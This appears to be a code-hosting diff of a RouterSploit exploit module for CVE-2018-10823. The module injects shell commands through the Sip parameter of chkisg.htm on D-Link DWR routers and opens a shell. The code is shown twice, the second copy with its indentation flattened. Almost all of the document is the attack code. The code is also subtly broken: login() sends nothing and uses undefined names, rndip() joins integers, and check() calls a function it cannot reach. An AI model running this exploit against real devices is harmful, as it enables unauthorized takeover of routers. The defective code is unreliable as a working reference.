paralax · October 18, 2018 20:52
diff --git a/dlink_dwr_rce.py b/dlink_dwr_rce.py
 import random

 from routersploit.core.exploit import *
 from routersploit.core.http.http_client import HTTPClient

 class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link router Command Execution",
        "description": """This module exploits a vulnerability in D-Link router httpd server. An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.""",
        "authors": (
            "@jnazario",  # routersploit module
            'Blazej Adamczyk' # discovery and PoC
        ),
        "references": (
            "http://sploit.tech/2018/10/12/D-Link.html",
            "CVE-2018-10823"
        ),
        "devices": (
            'DWR-116 through 1.06',
            'DWR-512 through 2.02',
            'DWR-712 through 2.02',
            'DWR-912 through 2.02',
            'DWR-921 through 2.02',
            'DWR-111 through 1.01'
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")
    
    username = OptString("admin", "Account for lofin")    
    password = OptString("password", "Account's password")    
    
    def run(self):
        self.login()
        if self.check():
            print_success("Target appears to be vulnerable")
            shell(self)
        else:
            print_error("Target is not vulnerable")
    
    def login(self):
        vars_post = {
            'name': username,
            'password': base64.encodestring(password)
        }
        
        return True

    def execute(self, cmd):
        def rndip():
            return '.'.join(random.randint(1,256) for _ in xrange(4))
            
        self.http_request(method='GET',
                          path=self.basepath.rstrip('/') + '/chkisg.htm?Sip=' + rndip() + ' | ' + cmd)
    
    @mute
    def check(self):
        response = self.http_request(method='GET',
                                     path=self.basepath.rstrip('/') + '/chkisg.htm?Sip=' + rndip())
        if response is None:
            return False
        if response.status_code == 200:
            return True
        return False
	import random

	from routersploit.core.exploit import *
	from routersploit.core.http.http_client import HTTPClient

	class Exploit(HTTPClient):
	__info__ = {
	"name": "D-Link router Command Execution",
	"description": """This module exploits a vulnerability in D-Link router httpd server. An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.""",
	"authors": (
	"@jnazario", # routersploit module
	'Blazej Adamczyk' # discovery and PoC
	),
	"references": (
	"http://sploit.tech/2018/10/12/D-Link.html",
	"CVE-2018-10823"
	),
	"devices": (
	'DWR-116 through 1.06',
	'DWR-512 through 2.02',
	'DWR-712 through 2.02',
	'DWR-912 through 2.02',
	'DWR-921 through 2.02',
	'DWR-111 through 1.01'
	)
	}

	target = OptIP("", "Target IPv4 or IPv6 address")
	port = OptPort(80, "Target HTTP port")

	username = OptString("admin", "Account for lofin")
	password = OptString("password", "Account's password")

	def run(self):
	self.login()
	if self.check():
	print_success("Target appears to be vulnerable")
	shell(self)
	else:
	print_error("Target is not vulnerable")

	def login(self):
	vars_post = {
	'name': username,
	'password': base64.encodestring(password)
	}

	return True

	def execute(self, cmd):
	def rndip():
	return '.'.join(random.randint(1,256) for _ in xrange(4))

	self.http_request(method='GET',
	path=self.basepath.rstrip('/') + '/chkisg.htm?Sip=' + rndip() + ' \| ' + cmd)

	@mute
	def check(self):
	response = self.http_request(method='GET',
	path=self.basepath.rstrip('/') + '/chkisg.htm?Sip=' + rndip())
	if response is None:
	return False
	if response.status_code == 200:
	return True
	return False